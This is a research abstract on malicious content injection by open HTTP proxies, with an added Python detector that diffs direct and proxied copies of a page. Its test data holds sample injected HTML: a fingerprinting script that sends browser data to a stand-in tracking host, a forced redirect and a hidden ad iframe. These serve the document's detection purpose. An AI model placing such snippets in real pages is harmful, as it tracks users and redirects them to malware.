Abstract
Open HTTP proxies offer a fast and convenient solution for routing web traffic towards
a destination. In contrast to more elaborate relaying systems, such as anonymity
networks or VPN services, users can freely connect to an open HTTP proxy without the
need to install any special software. Therefore, open HTTP proxies are an attractive option
for bypassing IP-based filters and geo-location restrictions, circumventing content
blocking and censorship, and in general, hiding the client’s IP address when accessing a
web server. Nevertheless, the consequences of routing traffic through an untrusted third
party can be severe, while the operating incentives of the thousands of publicly available
HTTP proxies are questionable.
In this work, we present the results of a large-scale analysis of open HTTP proxies, focusing
on determining the extent to which user traffic is manipulated while being relayed.
We have designed and implemented a methodology for detecting proxies that, instead of
passively relaying traffic, actively modify the relayed content. Beyond simple detection,
the framework is capable of macroscopically attributing certain traffic modifications at the
network level to well-defined malicious actions, such as ad injection, user fingerprinting,
and redirection to malware landing pages, to name a few.
We have applied our methodology on a set of nearly 65,000 open HTTP proxies,
which we monitored for a period of two months. Our findings are alarming. A significant
fraction (5.15%) of the proxies we tested were found to perform some form of content
injection in the retrieved HTML page that can be considered malicious or unwanted.
Specifically, in 47% of these cases the injected code served advertisements, in 39% it
collected user information that can be used for fingerprinting and tracking, and in 12% it
attempted to redirect the user to pages that contained malware.
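The detection step described above (comparing the page relayed through a proxy against a control copy fetched directly, then attributing each injected element to ad injection, fingerprinting, or redirection to a landing page) can be sketched as follows. This is an added example and not the paper's framework: the control and proxied responses are constructed strings, the host names use the reserved `.example` and `.invalid` domains, and the classification rules (`REDIRECT_RE`, `FINGERPRINT_RE`, and treating an injected third-party iframe or script as the ad category) are a minimal heuristic assumed here.

```python
"""Differential detection of content injected by an open HTTP proxy.

Added example, not code from the paper: fetch a control page directly and
through the proxy, diff the active elements (scripts, iframes, meta refresh),
and attribute each injected element to one of the categories the abstract
names. All responses below are constructed test data; the rules are a minimal
heuristic classifier, not the paper's.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed control page, as if fetched directly from the origin over HTTP.
BASELINE_HTML = """<html><head><title>control</title>
<script src="http://control.example/app.js"></script></head>
<body><p>hello</p></body></html>"""

# Constructed response for the same URL relayed by a misbehaving proxy: the
# original content is intact but three elements have been added.
PROXIED_HTML = """<html><head><title>control</title>
<script src="http://control.example/app.js"></script>
<meta http-equiv="refresh" content="0;url=http://landing.invalid/">
<script>var f = navigator.plugins.length + screen.width;
new Image().src = "http://track.invalid/c?f=" + f;</script></head>
<body><p>hello</p>
<iframe src="http://ads.invalid/frame?id=1" width="1" height="1"></iframe>
</body></html>"""

# Heuristic signatures (assumption: a small rule set for the demo).
REDIRECT_RE = re.compile(r"\blocation(\.href|\.replace|\.assign)?\s*[=(]")
FINGERPRINT_RE = re.compile(
    r"navigator\.(plugins|userAgent|languages|hardwareConcurrency)"
    r"|screen\.(width|height|colorDepth)|toDataURL")


class ActiveContent(HTMLParser):
    """Collects the element kinds a proxy typically injects, in document order."""

    def __init__(self):
        super().__init__()
        self.items = []          # list of (kind, value)
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "script":
            if a.get("src"):
                self.items.append(("script_src", a["src"]))
            else:
                self._in_script, self._buf = True, []
        elif tag == "iframe" and a.get("src"):
            self.items.append(("iframe_src", a["src"]))
        elif tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            self.items.append(("meta_refresh", a.get("content", "")))

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self._in_script = False
            # Collapse whitespace so re-indentation alone does not look like a change.
            self.items.append(("inline_script", " ".join("".join(self._buf).split())))


def extract(html):
    parser = ActiveContent()
    parser.feed(html)
    parser.close()
    return parser.items


def classify(kind, value, baseline_hosts):
    """Attribute one injected element to a category (heuristic, see module docstring)."""
    if kind == "meta_refresh":
        return "redirect"
    if kind == "inline_script":
        if REDIRECT_RE.search(value):
            return "redirect"
        if FINGERPRINT_RE.search(value):
            return "fingerprinting"
        return "unknown_script"
    host = urlsplit(value).hostname
    if host and host not in baseline_hosts:
        # Ad injection shows up as third-party iframes/scripts the origin never
        # referenced; a real classifier would additionally match a domain list.
        return "third_party_content"
    return "same_origin_script"


def detect_injection(baseline_html, proxied_html):
    """Return (modified, findings); each finding is (category, kind, value)."""
    normalize = lambda s: " ".join(s.split())
    if normalize(baseline_html) == normalize(proxied_html):
        return False, []
    base = extract(baseline_html)
    prox = extract(proxied_html)
    baseline_hosts = {urlsplit(v).hostname for k, v in base if k.endswith("_src")}
    injected = [item for item in prox if item not in base]
    findings = [(classify(k, v, baseline_hosts), k, v) for k, v in injected]
    return True, findings


if __name__ == "__main__":
    modified, findings = detect_injection(BASELINE_HTML, PROXIED_HTML)
    print("modified:", modified)
    for category, kind, value in findings:
        print(f"{category:20} {kind:14} {value[:60]}")
```

To run this against a live proxy, fetch the control URL once directly and once with the proxy configured and pass both bodies to `detect_injection`. A proxy can only rewrite pages fetched over plain HTTP; a page fetched through CONNECT over HTTPS is opaque to it unless it terminates TLS with a certificate the client would reject, so an HTTP control page is the right probe. A body that differs after whitespace normalisation but yields no injected active element (`modified` true, empty findings) should be inspected by hand rather than counted as an injection.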
Our study reveals the true incentives of many of the publicly available web proxies.
Our findings raise several concerns, as we demonstrate multiple cases where the user can
be severely affected by connecting to an open proxy. In addition, we have compiled a list
of the malicious proxy servers identified so far, which should be avoided and blacklisted.
Last but not least, our framework can stand as an open monitor for detecting additional
malicious proxies in the future.